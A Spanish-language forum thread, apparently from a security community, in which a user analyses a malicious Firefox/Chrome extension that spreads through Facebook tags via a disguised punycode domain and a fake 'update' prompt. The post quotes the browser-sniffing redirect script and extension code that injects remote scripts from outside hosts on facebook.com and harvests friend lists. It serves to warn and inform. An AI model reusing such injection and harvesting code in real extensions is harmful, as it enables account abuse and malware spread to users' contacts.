(http://i1253.photobucket.com/albums/hh586/davzcode/Sintiacutetulo_zps9e4219c1.png)
El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات y según google es Persa... que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h WDF...!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:
var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}
Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.
Con el siguiente mensaje:
Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.
(http://i1253.photobucket.com/albums/hh586/davzcode/Dibujo1_zps33fbe2f8.jpg)
Lo que me dio risa fue ese mensaje de
"Debido a los errores del sistema y vulnerabilidades de seguridad" jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.
https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/ (https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/)
y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.
(http://i1253.photobucket.com/albums/hh586/davzcode/Dibujo3_zpsaae8b6ba.jpg)
Y encontré algo que me resulto familiar
if(location.hostname.indexOf("facebook.com") >= 0){
addJavascript('http://sosyalpaket.net/yeni.php');
addJavascript('http://fbmedyahizmetleri.com/bakgel.php');
addJavascript('http://facebookhizmetlerim.com/user.php');
}
En el user.php me tope con:
"https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.
(http://i1253.photobucket.com/albums/hh586/davzcode/socialfb_zpscc990c1f.png)
Lo más razonable es eliminarlo.
Saludos
Buenísimo aporte, y gran descubrimiento, gracias por aportarlo, ahora nadamás nos queda darlo a conocer para que todos se cuiden.
Saludos.
Muy interesante el post . podrias subir la muestra del malware a algun lado ? me interesaria hacerle un research en especial a ese supuesto "bypass" de chrome saludos :)
muy buena explicacion sobre todo con las imagenes que dejan ver lo necesario ... pero bueno si tiene alguien tutorial sobre esto y de likejacking seriabueno q lo incluyan aca
excelente informacion ...... codepunisher